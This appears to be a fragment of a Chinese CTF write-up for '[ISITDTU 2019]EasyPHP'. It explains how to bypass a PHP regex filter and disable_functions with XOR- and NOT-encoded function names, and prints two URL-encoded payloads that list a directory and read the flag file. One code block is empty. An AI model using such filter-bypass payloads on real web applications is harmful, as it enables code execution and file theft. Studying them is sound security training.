x
day3依旧想吃炸鸡
[ISITDTU 2019]EasyPHP
写脚本查看正则过滤有哪些字符可以用,count_chars判断输入字符种类,取反绕过字母过滤
!!@i结合chr拼接数字字母,字符串调用函数,trim将整数转型为字符串
查看绕过disable_function和正则匹配的可用函数脚本
1 | <?php |
超详解,用show_source或readfile读取end文件
也就是说把16个字符中挑3个用剩余十三个表达出来,这样就达到消元的目的,只用到10个字符
1 | print_r=(%8f%8d%96%91%8b%a0%8d)^(%ff%ff%ff%ff%ff%ff%ff) |
1 | ((%8c%90%90%88%a0%8c%90%8a%8d%9c%8c)^(%8c%8a%90%88%a0%8c%90%8a%8d%9c%8a)^(%8c%8d%90%88%a0%8c%90%8a%8d%9c%9c)^(%ff%ff%ff%ff%ff%ff%ff%ff%ff%ff%ff))(((%8c%8c%8a)^(%8a%90%8d)^(%9c%8d%9c)^(%ff%ff%ff))(((%8c%9c%88%8c%8a%8c%8d)^(%8c%9c%8a%90%8d%90%8d)^(%8c%9c%9c%8d%9c%8a%8d)^(%ff%ff%ff%ff%ff%ff%ff))(%d1^%ff))); |
如有错误,多多指教